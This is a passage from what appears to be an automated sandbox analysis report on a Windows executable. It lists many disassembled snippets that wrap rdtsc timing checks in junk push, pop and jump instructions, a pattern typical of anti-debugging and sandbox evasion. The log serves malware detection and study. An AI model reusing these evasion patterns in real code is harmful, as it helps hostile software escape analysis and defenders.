0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pop edx 0x00000063 pop eax 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618B82 second address: 618B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618B8C second address: 618B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618B96 second address: 618B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618B9C second address: 618BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jne 00007F0148C8B7A6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618BAF second address: 618BC7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0148B5814Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F0148B58146h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618E73 second address: 618E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 619176 second address: 61917F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6192DB second address: 6192F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0148C8B7B2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6192F2 second address: 6192F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61C37B second address: 61C389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61C78E second address: 61C7A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61C7A9 second address: 61C7DD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0148C8B7ACh 0x00000008 jnl 00007F0148C8B7A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F0148C8B7AAh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0148C8B7B4h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61C7DD second address: 61C7E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CBCD second address: 58CBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CBD3 second address: 58CBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CBD7 second address: 58CBF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 58CBF1 second address: 58CBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62011A second address: 620120 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 623F46 second address: 623F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0148B58146h 0x0000000a popad 0x0000000b js 00007F0148B5815Fh 0x00000011 jmp 00007F0148B58153h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 627C95 second address: 627CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0148C8B7AAh 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0148C8B7ADh 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F0148C8B7B6h 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jno 00007F0148C8B7A6h 0x00000027 jnl 00007F0148C8B7A6h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 627FA3 second address: 627FA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628102 second address: 628108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628108 second address: 62811B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0148B5814Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F0148B58146h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62827C second address: 62828B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62828B second address: 628290 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628290 second address: 628299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628299 second address: 62829D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E13B second address: 62E141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E141 second address: 62E145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E145 second address: 62E149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E149 second address: 62E14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E2B6 second address: 62E30E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0148C8B7B0h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F0148C8B7ADh 0x00000016 jmp 00007F0148C8B7AEh 0x0000001b pushad 0x0000001c jmp 00007F0148C8B7B8h 0x00000021 jp 00007F0148C8B7A6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5D798E second address: 5D7992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E716 second address: 62E721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0148C8B7A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62F0B5 second address: 62F0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F0148B58146h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0148B5814Fh 0x00000012 popad 0x00000013 popad 0x00000014 push edi 0x00000015 pushad 0x00000016 jmp 00007F0148B5814Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63715C second address: 63716E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0148C8B7AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63716E second address: 63718A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148B58153h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63718A second address: 6371BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jng 00007F0148C8B7DCh 0x0000000d pushad 0x0000000e ja 00007F0148C8B7A6h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 jbe 00007F0148C8B7A6h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F0148C8B7B2h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6371BD second address: 6371C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6371C1 second address: 6371C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635322 second address: 63532E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F0148B58146h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635780 second address: 635791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0148C8B7ABh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635791 second address: 635795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635795 second address: 63579B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 635FD5 second address: 635FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0148B58157h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6362BB second address: 6362C5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0148C8B7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6362C5 second address: 6362CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6362CE second address: 6362EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0148C8B7A6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 jns 00007F0148C8B7A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6362EC second address: 6362FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a jnc 00007F0148B58146h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6362FE second address: 636312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jns 00007F0148C8B7AAh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 636849 second address: 63684D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63684D second address: 636852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 636B3F second address: 636B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 636DF6 second address: 636E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0148C8B7ABh 0x0000000a jns 00007F0148C8B7C9h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0148C8B7B9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 636E4C second address: 636E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 636E50 second address: 636E64 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0148C8B7A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 636E64 second address: 636E72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F0148B5814Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B1EA second address: 63B20B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F0148C8B7B7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B371 second address: 63B375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B75A second address: 63B76D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007F0148C8B7A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B76D second address: 63B778 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B8A5 second address: 63B8C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0148C8B7B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B8C5 second address: 63B8CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B8CB second address: 63B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63B8D1 second address: 63B8E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0148B58146h 0x00000009 js 00007F0148B58146h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63D3CE second address: 63D3D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0148C8B7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64A16E second address: 64A173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64A173 second address: 64A183 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0148C8B7A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64B69C second address: 64B6A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64B6A4 second address: 64B6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64BCD1 second address: 64BCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0148B58146h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 popad 0x00000012 push ebx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651E17 second address: 651E21 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0148C8B7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6517ED second address: 6517F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6517F3 second address: 6517F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6517F7 second address: 651801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0148B58146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651801 second address: 65182B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0148C8B7A6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jnc 00007F0148C8B7BDh 0x00000017 jmp 00007F0148C8B7B1h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651966 second address: 651972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651972 second address: 651977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 651977 second address: 65197C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65197C second address: 651998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F0148C8B7B1h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 657DEA second address: 657DFA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0148B58146h 0x00000008 ja 00007F0148B58146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 657DFA second address: 657E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 657E00 second address: 657E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F689 second address: 65F68D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F68D second address: 65F6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 ja 00007F0148B58146h 0x0000000f jns 00007F0148B58146h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F6A4 second address: 65F6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0148C8B7B7h 0x0000000c jmp 00007F0148C8B7B0h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F6D2 second address: 65F6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F0E8 second address: 65F0EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F0EC second address: 65F0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F0F2 second address: 65F0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65F0FA second address: 65F126 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0148B58146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F0148B58146h 0x00000017 jmp 00007F0148B58155h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 663CD3 second address: 663CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 663CDB second address: 663CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 663CE0 second address: 663CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 663CE6 second address: 663CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 663CEA second address: 663CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F0148C8B7A6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66383C second address: 663845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
